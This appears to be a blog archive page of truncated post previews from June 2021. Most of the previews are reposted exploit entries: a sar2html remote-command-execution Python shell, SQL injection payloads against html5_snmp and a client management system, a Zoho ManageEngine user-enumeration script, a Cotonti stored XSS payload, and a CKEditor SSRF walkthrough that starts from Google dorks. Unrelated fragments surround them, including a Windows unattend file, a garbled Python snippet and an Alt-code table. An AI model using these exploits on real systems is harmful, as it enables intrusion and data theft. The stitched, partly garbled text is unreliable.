Posts

Showing posts from June 2021

Windows user

  <?xml version="1.0" encoding="utf-8"?>
  <unattend xmlns="urn:schemas-microsoft-com:unattend">
    <settings pass="oobeSystem">
      <component name="Microsoft-Windows-Deployment" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
        <Reseal>
          <Mode>OOBE</Mode>
        </Reseal>
      </component>
      <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
        <OOBE>
          <HideO...

variables ojk..

  # Exploit Title: html5_snmp 1.11 - 'Router_ID' SQL Injection
  # Date: 2019-11-01
  # Exploit Author: Cakes
  # Vendor Homepage: https://github.com/lolypop55/html5_snmp
  # Software Link: https://github.com/lolypop55/html5_snmp.git
  # Version: 1.11
  # Tested on: CentOS 7
  # CVE: N/A
  # PoC for error, time, boolean and Union based SQL Injection
  # Parameter: Router_ID (POST)
  # Type: error-based
  # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  # Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
  Payload: Router_ID=123' AND (SELECT 9724 FROM(SELECT COUNT(*),CONCAT(0x716a7a7071,(SELECT (ELT(9724=9724,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'aJYp'='aJYp&Router_Name=123&Router_IP=123&String=123&Remark=123&Submit=...

  # Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution
  # Date: 27-12-2020
  # Exploit Author: Musyoka Ian
  # Vendor Homepage: https://github.com/cemtan/sar2html
  # Software Link: https://sourceforge.net/projects/sar2html/
  # Version: 3.2.1
  # Tested on: Ubuntu 18.04.1

  #!/usr/bin/env python3
  import requests
  import re
  from cmd import Cmd

  url = input("Enter The url => ")

  class Terminal(Cmd):
      prompt = "Command => "
      def default(self, args):
          exploiter(args)

  def exploiter(cmd):
      global url
      sess = requests.session()
      output = sess.get(f"{url}/index.php?plot=;{cmd}")
      try:
          out = re.findall("<option value=(.*?)>", output.text)
      except:
          print("Error!!")
      for ouut in out:
          if "There is no defined host..." not in ouut:
              if "null selected" not i...

  # Exploit Title: Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration
  # Date: 17/06/2021
  # Exploit Author: Ricardo Ruiz (@ricardojoserf)
  # CVE: CVE-2021-31159 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31159)
  # Vendor Homepage: https://www.manageengine.com
  # Vendor Confirmation: https://www.manageengine.com/products/service-desk-msp/readme.html#10519
  # Version: Previous to build 10519
  # Tested on: Zoho ManageEngine ServiceDesk Plus 9.4
  # Example: python3 exploit.py -t http://example.com/ -d DOMAIN -u USERSFILE [-o OUTPUTFILE]
  # Repository (for updates and fixing bugs): https://github.com/ricardojoserf/CVE-2021-31159

  import argparse
  import requests
  import urllib3

  urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

  def get_args():
      parser = argparse.ArgumentParser()
      parser.add_argument('-d', '--domain', required=True, action='store', help='Domain to attack')
      ...

Python algorithms from the basics, with several variables and easy-to-understand terms print : (´´ 1 + 9 ´´)  input x = ( 10 )
  # Exploit Title: Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting
  # Date: 2021-15-06
  # Exploit Author: Fatih İLGİN
  # Vendor Homepage: cotonti.com
  # Vulnerable Software: https://www.cotonti.com/download/siena_0919
  # Affected Version: 0.9.19
  # Tested on: Windows 10
  # Vulnerable Parameter Type: POST
  # Vulnerable Parameter: maintitle
  # Attack Pattern: "><img src=1 href=1 onerror="javascript:alert(1)"></img>
  # Description
  1) Entering the Admin Panel (vulnerableapplication.com/cotonti/admin.php)
  2) Then go to Configuration tab and set payload ("><img src=1 href=1 onerror="javascript:alert(1)"></img>) for Site title param
  3) Then click Update button
  4) In the end, Go to home page then shown triggered vulnerability
  # Proof of Concepts
  Request;
  POST /cotonti/admin.php?m=config&n=edit&o=core&p=title&a=update HTTP/1.1
  Host: vulnerableapplication.com
  User-Agent: Mozilla/5.0 ...

  # Exploit Title: Client Management System 1.1 - 'Search' SQL Injection
  # Date: 14 June 2021
  # Exploit Author: BHAVESH KAUL
  # Vendor Homepage: https://phpgurukul.com
  # Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/
  # Version: 1.1
  # Tested on: Server: XAMPP
  # Description #
  Client Management System 1.1 is vulnerable to SQL Injection in the admin panel 'search invoices' field because of insufficient user supplied data sanitization.
  # Proof of Concept (PoC) : Exploit #
  1) Goto: http://localhost/clientms/admin/index.php
  2) Login as admin using test credentials: admin/Test@123
  3) Goto: http://localhost/clientms/admin/search-invoices.php
  4) Enter the following payload in the search field: ' OR 'x'='x
  5) All results are shown instead of none ==> SQL Injection success

  # Exploit Title: CKEditor 3 - Server-Side Request Forgery (SSRF)
  # Google Dorks : inurl /editor/filemanager/connectors/uploadtest.html
  # Date: 12-6-2021
  # Exploit Author: Blackangel
  # Software Link: https://ckeditor.com/
  # Version:all version under 4 (1,2,3)
  # Tested on: windows 7
  Steps of Exploit:-
  1-using google dorks inurl /editor/filemanager/connectors/uploadtest.html
  2-after going to vulnerable page you will find field "Custom Uploader URL: "
  3-right click then choose inspect element, click on pick an element from the page , select field Custom Uploader URL:
  4-in elements "<input id="txtCustomUrl" style="WIDTH: 100%; BACKGROUND-COLOR: #dcdcdc" disabled="" type="text">" delete disabled=""
  5-now you can put url start with any protocol
  6-send it to the server as you see website that you have entered link is appear into page . what this mean??!!1 you send request to server using vulnerable website you can said i used it as proxy hackers ...

  The Backstory

juan sebastian castillo

  Symbol Alt+abcd Symbol Alt+abcd ☺ Alt- 1 ☻ Alt- 2 ♥ Alt- 3 ♦ Alt- 4 ♣ Alt- 5 ♠ Alt- 6 ● Alt- 7 ◘ Alt- 8 ○ Alt- 9 ◙ Alt- 10 ♂ Alt- 11 ♀ Alt- 12 ♪ Alt- 13 ♫ Alt- 14 ☼ Alt- 15 ► Alt- 16 ◄ Alt- 17 ↕ Alt- 18 ‼ Alt- 19 ¶ Alt- 20 § Alt- 21 ▬ Alt- 22 ↨ Alt- 23 ↑ Alt- 24 ↓ Alt- 25 → Alt- 26 ← Alt- 27 ∟ Alt- 28 ↔ Alt- 29 ▲ Alt- 30 ▼ Alt- 31 space Alt- 32 ! Alt- 33 " Alt- 34 # Alt- 35 $ Alt- 36 % Alt- 37 & Alt- 38 ' Alt- 39 ( Alt- 40 ) Alt- 41 * Alt- 42 + Alt- 43 , Alt- 44 - Alt- 45 . Alt- 46 / Alt- 47 0 Alt- 48 1 Alt- 49 2 Alt- 50 3 Alt- 51 4 Alt- 52 5 Alt- 53 6 Alt- 54 7 Alt- 55 8 Alt- 56 9 Alt- 57 : Alt- 58 ; Alt- 59 < Alt- 60 = Alt- 61 > Alt- 62 ? Alt- 63 @ Alt- 64 A Alt- 65 B Alt- 66 C Alt- 67 D Alt- 68 E Alt- 69 F Alt- 70 G Alt- 71 H Alt- 72 I Alt- 73 J Alt- 74 K Alt- 75 L Alt- 76 M Alt- 77 N Alt- 78 O Alt- 79 P Alt- 80 Q Alt- 81 R Alt- 82 S Alt- 83 T Alt- 84 U Alt- 85 V Alt- 86 W Alt- 87 X Alt- 88 Y Alt- 89 Z Alt- 90 [ Alt- 91 \ Alt- 92 ] Alt- 93 ^ Alt- 94 _ Alt- 9...